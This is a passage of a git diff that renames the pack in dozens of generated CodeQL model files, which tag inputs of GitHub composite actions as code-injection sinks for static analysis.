@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index 12011d64396..b8ded477dd2 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index 40ecb17610e..87ae2f5d614 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index 250606588f9..0cfd7be68a3 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index f2f5678b8b8..54a05620d90 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index b17eb01f821..e16f3fc74b3 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index 7ebdde766f3..a3f692e7d2f 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 7f2e1588139..5acd7348464 100644 
--- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index eedeb384422..365dd90b120 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index fb6fb0267bb..0d7a06175a5 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index 60df7484e7f..4c831ca673a 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index d0af7b61f98..40b5f413d66 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 8d08848d24c..565bd119df7 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index f26f672a586..31157d853d0 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index 5431aad8dca..6208b63b89a 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index 92c23f9f1fb..1073ddd49c1 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index 52654194d81..2b71886a286 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml 
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index 43c274aa033..547bcca2ec9 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index 7f8b87fa20e..e8ed66af89a 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index 31422a708c5..af1327f7d7f 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index 30ccfdea631..887743c2c70 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index 9bc22ac93ef..ff7e51e477a 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index 4ec47cb3975..55d0ddfba22 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml 
@@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index 81d137ce547..d4c0823c2ec 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index 79675d59c05..7d789ec3ccc 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index 3310a67347c..2aa6633d752 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index d12963b43db..536e6d914a2 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index 1c63a9e6d0f..45bfb025ac9 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index e120de812c4..bba69dfc7a0 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index 1be37285c9e..0fbc67e2b1b 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index aa6e9b684d0..6c6a4264d51 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index 221aa83de0b..ee18012a8f5 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 71007932427..3dc39052707 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index bff13b29ecc..b98826b9f02 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index 1f75dd81c04..d000c5eb4d5 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index 15604c34a17..409ef9564d3 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index aef7f4f6242..60a79604580 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] @@ -21,7 +21,7 @@ extensions: - ["jhipster/generator-jhipster", "*", "input.application-path", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index f3a26e867ec..4effdea078e 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index 4feab5714c7..d2c44be6261 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 3030f81072a..098782a6bef 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index 7f8885d1ec7..e08f4ba9bc2 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 93e6b1e0312..97326453158 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 5284159e9db..8f6c13884c5 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index ac8b8a5150a..f7f2f139e85 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 19e9448994e..11b423e871c 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 82c5713f943..954b2d05858 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 2d4108331b9..6cdb74f1278 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index ccd49962fa4..e6820c900e3 100644 
--- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index a7e56c8626d..ba3ad6e8b0c 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 4c0df425e45..114b8ce168e 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index a69f2303dbe..834353d89a8 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index c2c87969e93..1c903d71cbe 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index c1c3bf433cd..c34200337f2 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml 